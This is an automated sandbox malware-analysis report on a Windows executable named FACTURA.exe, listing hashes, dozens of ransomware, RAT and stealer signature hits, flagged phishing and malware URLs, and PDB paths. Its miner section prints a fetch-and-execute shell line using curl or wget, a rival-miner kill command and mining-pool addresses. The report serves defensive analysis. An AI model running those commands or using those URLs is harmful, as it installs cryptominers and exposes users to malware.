Windows Analysis Report FACTURA.exe

Overview

General Information

Sample Name: FACTURA.exe
Analysis ID: 1568
MD5: 740463ed3266f7aee8331978f50c731c
SHA1: a9310948476693d72be937f23e1b53b3607bf92f
SHA256: fa9e12a03b909482d5bacd2d7ab1a8d672528bfcf43402c04b6d3a30702b0c4d

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Remcos AESCRYPT Ransomware Annabelle
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Neshta
Detected Hacktool Mimikatz
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Parallax RAT
Yara detected Zeppelin Ransomware
Yara detected Ragnarok ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Yara detected Avaddon Ransomware
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected Koadic
Yara detected Jigsaw
Yara detected CryLock ransomware
Yara detected Pony
Yara detected Sapphire Ransomware
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected RansomwareGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
Yara detected Ouroboros ransomware
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected LimeRAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Ryuk ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected Porn Ransomware
Yara detected LockBit ransomware
Yara detected DarkSide Ransomware
Yara detected LOCKFILE ransomware
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected Rhino ransomware
Yara detected Mailto ransomware
Yara detected CoronaCrypt Ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected Buran Ransomware
Yara detected GoGoogle ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Detected Remcos RAT
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected Growtopia
Yara detected Xorist ransomware
Yara detected Windows Security Disabler
Yara detected Dorkbot
Yara detected RevengeRAT
Contains VNC / remote desktop functionality (version string found)
Found strings related to Crypto-Mining
Found Tor onion address
Yara detected MaliciousMacro
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sample is not signed and drops a device driver
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Found string related to ransomware
Yara detected MSILLoadEncryptedAssembly
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Yara detected BatToExe compiled binary
May drop file containing decryption instructions (likely related to ransomware)
Binary or sample is protected by dotNetProtector
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Yara detected Autohotkey Downloader Generic
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Sample execution stops while process was sleeping (likely an evasion)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Binary contains a suspicious time stamp
May initialize a security null descriptor
Yara detected Keylogger Generic
Uses 32bit PE files
Yara signature match
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Yara detected Winexe tool

Classification

AV Detection:

Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Antivirus detection for URL or domain
Source: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php Avira URL Cloud: Label: phishing
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: MpSigStub.exe.5556.36.memstrmin Malware Configuration Extractor: CryLock {"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}
Yara detected Njrat
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: http://www.bonusesfound.ml/update/index.php Virustotal: Detection: 13%
Source: http://110.42.4.180: Virustotal: Detection: 13%
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Antivirus or Machine Learning detection for unpacked file
Source: 36.3.MpSigStub.exe.197a4734ab6.49.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31aed77.165.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31aed77.74.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits:

Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

Yara detected Coinhive miner
Yara detected BitCoin Miner
Yara detected Xmrig cryptocurrency miner
Found strings related to Crypto-Mining
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: ld_library_path/tmp/udevs-acryptonight-ostratum+tcp://pool.fri3nds.in:8080-ulinuxserver-px-t$threads-bfiecho"*/5****curl-
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: xmrminer
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: grep"mine.moneropool.com"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep"xmr.crypto-pool.fr:8080
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber||wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: XMRig 2.15.1-beta

Compliance:

Uses 32bit PE files
Source: FACTURA.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000024.00000003.6326497821.00000197A3203000.00000004.00000001.sdmp
Source: Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: megasync.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: \\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb3 source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: (vbsedit_source\x64\Release\mywscript.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdb source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: vga256.pdb source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb] source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdbx source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\.+Server.+\.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb0 source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: winscard.pdb source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp
Source: Binary string: stscast.pdb source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: m:\VP\QM\trunk\output\Recorder.pdb source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp
Source: Binary string: bin\Release\LiveUpdateWPP.pdbxd source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: ^shell\BATLE_SOURCE\SampleService_run_shellcode_from-memory10-02-2016\Release\SampleService.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: \Visual Studio 2010\Projects\installer4\installer\obj\x86\Release\installer.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \InstallGoogleToolBar\InstallGoogleToolBar\obj\Debug\InstallGoogleToolBar.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918468716.00000000030C6000.00000004.00000001.sdmp
Source: Binary string: \Current\wear.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: PCSUQuickScan.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: hWEHW#@HJERKJERJER^$.Pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: e:\caoe.PDBa source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \yacdl\Release\yacdl.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: Krypton\source\repos\UAC\UAC\obj\Release\UAC.pdb source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: mpengine.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000009.00000003.2920056243.00000000030D7000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb* source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp
Source: Binary string: XrfZPp2C.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: UsoCoreWorker.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: _sa\bin\Release\ClientSAHook.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: w:\work\vcprj\prj\downloader\Release\injdldr.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source: Binary string: c:\To\In\All\With\Within\Value.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: security.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb0 source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \\MoonRat_Develop\\.+\\obj\\Release\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: \bin\Release.Minimal\officer.pdb source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbaT source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: LiuLiangBao\Release\LiuLiangBao.pdb source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp
Source: Binary string: \InstallerMainV6_Yrrehs\Release\Main.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb3 source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: sxs.pdbj source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000005.00000003.2855994969.00000000029B0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2919220866.00000000030BB000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.2856883159.00000000029A5000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962000837.00000000051D0000.00000004.00000040.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb( source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2927187876.000000000617A000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
